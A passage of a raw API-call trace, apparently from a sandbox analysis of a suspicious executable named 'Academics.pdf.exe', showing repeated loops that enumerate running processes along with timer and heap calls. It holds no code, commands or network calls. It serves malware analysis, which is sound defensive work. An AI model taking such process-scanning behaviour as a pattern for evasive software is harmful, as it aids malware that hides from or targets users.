lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0297.452] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0297.453] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0297.454] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0297.455] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0297.455] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0297.456] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0297.457] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0297.458] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0297.459] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0297.459] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0297.460] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0297.461] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0297.462] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0297.463] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0297.464] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0297.465] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0297.465] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0297.466] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0297.467] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.468] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0297.469] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.469] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0297.470] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0297.471] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0297.472] CloseHandle (hObject=0x294) returned 1 [0297.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0297.472] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.472] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.472] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0297.475] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.476] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0297.476] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0297.477] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0297.478] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0297.479] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0297.480] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0297.481] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0297.482] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0297.482] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0297.483] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.484] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.485] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.486] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.487] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.487] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0297.488] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.489] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.490] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0297.491] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0297.491] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0297.492] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0297.493] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.494] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0297.495] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0297.496] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0297.496] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0297.497] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0297.498] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0297.499] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0297.500] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0297.501] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0297.501] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0297.502] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0297.503] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0297.504] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0297.505] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0297.506] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0297.506] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0297.507] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0297.508] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0297.509] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0297.510] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0297.511] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.512] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0297.513] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.513] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0297.514] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0297.515] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0297.516] CloseHandle (hObject=0x294) returned 1 [0297.516] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0297.516] TranslateMessage (lpMsg=0x8bf970) returned 0 [0297.516] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0297.516] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0297.516] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0297.516] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0297.517] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0297.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0297.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0297.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0297.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0297.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0297.517] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0297.519] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.520] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0297.521] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 